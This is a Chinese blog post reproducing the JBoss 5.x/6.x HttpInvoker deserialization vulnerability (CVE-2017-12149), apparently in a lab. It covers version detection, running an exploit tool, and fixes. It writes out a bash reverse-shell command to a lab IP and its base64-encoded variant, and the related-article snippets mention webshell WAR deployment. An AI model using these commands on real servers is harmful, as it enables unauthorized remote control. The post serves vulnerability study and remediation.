JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 复现

最新推荐文章于 2024-06-26 08:00:00 发布
最新推荐文章于 2024-06-26 08:00:00 发布
阅读量648 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121073146
版权

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 复现

所有文章,仅供安全研究与学习之用,后果自负!

前言

使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码

一、JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

0x01 漏洞描述

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用 该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
在这里插入图片描述

8080端口

0x02 影响范围

JBoss 5.x/6.x

0x03 漏洞利用

版本号

/admin-console/login.seam?conversationId=4

在这里插入图片描述

工具直接利用

jboss反序列化_CVE-2017-12149.jar
(1) 启用工具
在这里插入图片描述
(2)检测
在这里插入图片描述
(3) 执行命令
成功
在这里插入图片描述
(4) 反弹shell
如前言那里所写 bash方法需要编码

bash -i >& /dev/tcp/192.168.157.137/9897 0>&1
编码为
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1Ny4xMzcvOTg5NyAwPiYx}|{base64,-d}|{bash,-i}

监听反弹shell
在这里插入图片描述
反弹shell成功
在这里插入图片描述

0x04 漏洞修复

建议用户升级到JBOSS AS7。另,不能及时升级的用户,可采取如下临时解决方案:
1.  不需要 http-invoker.sar 组件的用户可直接删除此组件。
2.  添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:<url-pattern>/*</url-pattern>
用于对 http invoker 组件进行访问控制。

总结

使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码

LuckyCharm~
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)的复现
mw_myever的博客
10-06 699
一、漏洞介绍 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞,该漏洞在内网中比较常见。 二、环境搭建 攻击机:192.168.70.2(kali) 受害机:192.168.70.3(vulhub) 利用命令:docker-compose up -d 启动环境 三、访问目标 1、探测 在kali上利用命令:
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149
zzzzz1284的博客
03-13 266
CVE-2017-12149
Jboss多个远程命令执行漏洞CVE-2017-12149CVE-2015-7501、CVE-2017-7504)
最新发布
qq_68163788的博客
06-26 1153
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBoss5.x / 6.x反序列化漏洞CVE-2017-12149
Kevin's Blog
06-08 832
一、漏洞介绍 1.1 漏洞详情   该漏洞为Java反序列化错误类型,存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化。该漏洞在内网中比较常见。 1.2 影响版本 JBoss 5.x 和 6.x 二、环境搭建 受害者:192.168.159.129(vulhub) 攻击者:192.168.158.128(kali) 》》进入到如下目录启动环境 》》查看启动的端口 》》访问we
JBoss 5.x/6.x 反序列化漏洞 CVE-2017-12149 漏洞复现
ADummy的博客
03-03 371
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影
漏洞复现JBoss漏洞总结
qq_45751902的博客
10-31 1472
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 反序列化漏洞详解及反弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149
willow_liang的博客
10-24 242
漏洞原理: 漏洞复现 下载利用工具 javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java javac将java源文件编译为class字节码文件。-cp指明.java文件中import类的位置 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
JBoss5.x6.x反序列化漏洞CVE-2017-12149复现学习
hklearner的博客
03-29 2164
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现学习 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞漏洞概要 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应
JBoss常见漏洞整理
热门推荐
寒星的博客
06-01 1万+
JBoss常见漏洞整理 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 JBoss高危漏洞主要涉及到以下两种。 第一种是利用未授权访问进入JBoss后台进行文件上传的漏洞,例如:CVE-2007-1036,CVE-2010-0738,CVE-2006.
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 569
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
渗透测试-JBoss 5.x/6.x反序列化漏洞
道阻且长,行则将至。
07-08 1738
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)
weixin_30606461的博客
11-27 170
  本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程 仅供学习   文中利用到漏洞环境由phith0n维护: JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)   靶机地址:192.168.1.102 服务端口:8080       测试机:192.168.1.100   搭建好环境,访问地址:http://192.168...
【vulhub】JBOSS 5.x/6.x 反序列化远程代码执行漏洞CVE-2017-12149复现
qq_45300786的博客
04-14 1137
一、漏洞说明 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 二、影响的版本 5.x和6.x版本的JBOSSAS 三、搭建环境 docker-compose
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 5764
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
JBoss 4.x与J2EE 1.4实战:从安装到应用开发
此外,文档还涉及了JBoss-IDE 1.4.0的安装过程,这是用于JBoss开发的集成开发环境,提供了安装的两种方式以及注意事项。之后,文档深入到具体的开发实践,讲解了基于JBoss 4.x 的JSF(JavaServer Faces)应用开发,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值